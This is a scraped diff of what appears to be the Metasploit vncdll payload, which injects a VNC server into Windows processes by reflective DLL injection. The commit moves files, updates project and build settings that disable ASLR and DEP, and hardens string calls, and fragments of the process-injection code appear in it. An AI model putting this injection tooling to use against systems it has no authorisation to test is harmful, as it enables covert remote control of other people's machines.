{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32
|
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||||
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32
|
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32
|
||||||
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|Win32
|
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
|
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.Build.0 = Debug|x64
|
||||||
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32
|
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32
|
||||||
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32
|
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32
|
||||||
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64
|
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64
|
||||||
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64
|
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64
|
||||||
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
|
|
||||||
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
|
|
||||||
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|Win32
|
|
||||||
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
|
|
||||||
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
|
|
||||||
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
|
|
||||||
EndGlobalSection
|
EndGlobalSection
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
HideSolutionNode = FALSE
|
HideSolutionNode = FALSE
|
2
external/source/vncdll/loader/context.c → external/source/vncdll/vncdll/context.c
vendored
Normal file → Executable file
2
external/source/vncdll/loader/context.c → external/source/vncdll/vncdll/context.c
vendored
Normal file → Executable file
|
@ -76,7 +76,7 @@ DWORD WINAPI context_message_thread( LPVOID lpParameter )
|
||||||
{
|
{
|
||||||
do
|
do
|
||||||
{
|
{
|
||||||
_snprintf( cNamedPipe, MAX_PATH, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
|
_snprintf_s( cNamedPipe, MAX_PATH, MAX_PATH - 1, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
|
||||||
|
|
||||||
dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe );
|
dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe );
|
||||||
|
|
2
external/source/vncdll/loader/inject.c → external/source/vncdll/vncdll/inject.c
vendored
Normal file → Executable file
2
external/source/vncdll/loader/inject.c → external/source/vncdll/vncdll/inject.c
vendored
Normal file → Executable file
|
@ -1,7 +1,7 @@
|
||||||
#include "loader.h"
|
#include "loader.h"
|
||||||
#include "ps.h"
|
#include "ps.h"
|
||||||
#include "inject.h"
|
#include "inject.h"
|
||||||
#include "LoadLibraryR.h"
|
#include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
|
||||||
#include <Tlhelp32.h>
|
#include <Tlhelp32.h>
|
||||||
|
|
||||||
// Simple trick to get the current meterpreters arch
|
// Simple trick to get the current meterpreters arch
|
5
external/source/vncdll/loader/loader.c → external/source/vncdll/vncdll/loader.c
vendored
Normal file → Executable file
5
external/source/vncdll/loader/loader.c → external/source/vncdll/vncdll/loader.c
vendored
Normal file → Executable file
|
@ -5,11 +5,12 @@
|
||||||
#include "ps.h"
|
#include "ps.h"
|
||||||
#include "session.h"
|
#include "session.h"
|
||||||
#include "inject.h"
|
#include "inject.h"
|
||||||
#include "ReflectiveLoader.h"
|
|
||||||
|
|
||||||
#define VNCFLAG_DISABLECOURTESYSHELL 1
|
#define VNCFLAG_DISABLECOURTESYSHELL 1
|
||||||
#define VNCFLAG_DISABLESESSIONTRACKING 2
|
#define VNCFLAG_DISABLESESSIONTRACKING 2
|
||||||
|
|
||||||
|
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
||||||
|
|
||||||
/*
|
/*
|
||||||
* The HINSTANCE of this injected dll.
|
* The HINSTANCE of this injected dll.
|
||||||
*/
|
*/
|
||||||
|
@ -173,7 +174,7 @@ DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine )
|
||||||
|
|
||||||
hAgentProcess = hProcess;
|
hAgentProcess = hProcess;
|
||||||
|
|
||||||
_snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory );
|
_snprintf_s( cpCommandLine, COMMANDLINE_LENGTH, COMMANDLINE_LENGTH - 1, "/v /c:0x%08p", lpMemory );
|
||||||
|
|
||||||
} while( 0 );
|
} while( 0 );
|
||||||
|
|
|
@ -0,0 +1,18 @@
|
||||||
|
|
||||||
|
#ifdef _X64_
|
||||||
|
|
||||||
|
#ifdef _DEBUG
|
||||||
|
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\x64\\winvnc.x64.dll"
|
||||||
|
#else
|
||||||
|
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\x64\\winvnc.x64.dll"
|
||||||
|
#endif
|
||||||
|
|
||||||
|
#else
|
||||||
|
|
||||||
|
#ifdef _DEBUG
|
||||||
|
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\Win32\\winvnc.x86.dll"
|
||||||
|
#else
|
||||||
|
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\Win32\\winvnc.x86.dll"
|
||||||
|
#endif
|
||||||
|
|
||||||
|
#endif
|
6
external/source/vncdll/loader/session.c → external/source/vncdll/vncdll/session.c
vendored
Normal file → Executable file
6
external/source/vncdll/loader/session.c → external/source/vncdll/vncdll/session.c
vendored
Normal file → Executable file
|
@ -18,7 +18,7 @@ DWORD session_id( DWORD dwProcessId )
|
||||||
{
|
{
|
||||||
if( !pProcessIdToSessionId )
|
if( !pProcessIdToSessionId )
|
||||||
{
|
{
|
||||||
hKernel = LoadLibrary( "kernel32.dll" );
|
hKernel = LoadLibraryA( "kernel32.dll" );
|
||||||
if( hKernel )
|
if( hKernel )
|
||||||
pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" );
|
pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" );
|
||||||
}
|
}
|
||||||
|
@ -53,7 +53,7 @@ DWORD session_activeid()
|
||||||
{
|
{
|
||||||
if( !pWTSGetActiveConsoleSessionId )
|
if( !pWTSGetActiveConsoleSessionId )
|
||||||
{
|
{
|
||||||
hKernel = LoadLibrary( "kernel32.dll" );
|
hKernel = LoadLibraryA( "kernel32.dll" );
|
||||||
if( hKernel )
|
if( hKernel )
|
||||||
pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" );
|
pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" );
|
||||||
}
|
}
|
||||||
|
@ -141,7 +141,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer )
|
||||||
CloseHandle( hToken );
|
CloseHandle( hToken );
|
||||||
}
|
}
|
||||||
|
|
||||||
hKernel = LoadLibrary( "kernel32" );
|
hKernel = LoadLibraryA( "kernel32" );
|
||||||
if( !hKernel )
|
if( !hKernel )
|
||||||
break;
|
break;
|
||||||
|
|
|
@ -0,0 +1,245 @@
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Debug|x64">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|Win32">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|x64">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
</ItemGroup>
|
||||||
|
<PropertyGroup Label="Globals">
|
||||||
|
<ProjectGuid>{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}</ProjectGuid>
|
||||||
|
<RootNamespace>vncdll</RootNamespace>
|
||||||
|
<Keyword>Win32Proj</Keyword>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<PropertyGroup Label="UserMacros" />
|
||||||
|
<PropertyGroup>
|
||||||
|
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
</PropertyGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<PreprocessorDefinitions>WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<MinimalRebuild>true</MinimalRebuild>
|
||||||
|
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
</Link>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<Midl>
|
||||||
|
<TargetEnvironment>X64</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<MinimalRebuild>true</MinimalRebuild>
|
||||||
|
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<TargetMachine>MachineX64</TargetMachine>
|
||||||
|
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
</Link>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_X64_;_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>MaxSpeed</Optimization>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<PreprocessorDefinitions>WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
|
<Link>
|
||||||
|
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
|
||||||
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<Midl>
|
||||||
|
<TargetEnvironment>X64</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>MaxSpeed</Optimization>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_X64_;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
|
<Link>
|
||||||
|
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
|
||||||
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||||
|
<TargetMachine>MachineX64</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
|
||||||
|
<ClCompile Include="context.c" />
|
||||||
|
<ClCompile Include="loader.c" />
|
||||||
|
<ClCompile Include="inject.c" />
|
||||||
|
<ClCompile Include="ps.c" />
|
||||||
|
<ClCompile Include="session.c" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="context.h" />
|
||||||
|
<ClInclude Include="loader.h" />
|
||||||
|
<ClInclude Include="inject.h" />
|
||||||
|
<ClInclude Include="ps.h" />
|
||||||
|
<ClInclude Include="session.h" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ResourceCompile Include="loader.rc" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ProjectReference Include="..\winvnc\WinVNC.vcxproj">
|
||||||
|
<Project>{ea6a09ac-04bb-423d-8842-ca48df901058}</Project>
|
||||||
|
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
|
||||||
|
</ProjectReference>
|
||||||
|
</ItemGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
</ImportGroup>
|
||||||
|
</Project>
|
|
@ -0,0 +1,65 @@
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup>
|
||||||
|
<Filter Include="Source Files">
|
||||||
|
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||||
|
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Source Files\core">
|
||||||
|
<UniqueIdentifier>{7c56685d-83b5-4541-b5dd-a620ffe19b23}</UniqueIdentifier>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Header Files">
|
||||||
|
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||||
|
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Header Files\core">
|
||||||
|
<UniqueIdentifier>{6b6dd5ba-1f40-449f-a55b-7180bb0793a0}</UniqueIdentifier>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Resource Files">
|
||||||
|
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||||
|
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav</Extensions>
|
||||||
|
</Filter>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="context.c">
|
||||||
|
<Filter>Source Files</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="loader.c">
|
||||||
|
<Filter>Source Files</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="inject.c">
|
||||||
|
<Filter>Source Files\core</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="ps.c">
|
||||||
|
<Filter>Source Files\core</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="session.c">
|
||||||
|
<Filter>Source Files\core</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
|
||||||
|
<Filter>Source Files\core</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="context.h">
|
||||||
|
<Filter>Header Files</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="loader.h">
|
||||||
|
<Filter>Header Files</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="inject.h">
|
||||||
|
<Filter>Header Files\core</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="ps.h">
|
||||||
|
<Filter>Header Files\core</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="session.h">
|
||||||
|
<Filter>Header Files\core</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ResourceCompile Include="loader.rc">
|
||||||
|
<Filter>Resource Files</Filter>
|
||||||
|
</ResourceCompile>
|
||||||
|
</ItemGroup>
|
||||||
|
</Project>
|
|
@ -1,53 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
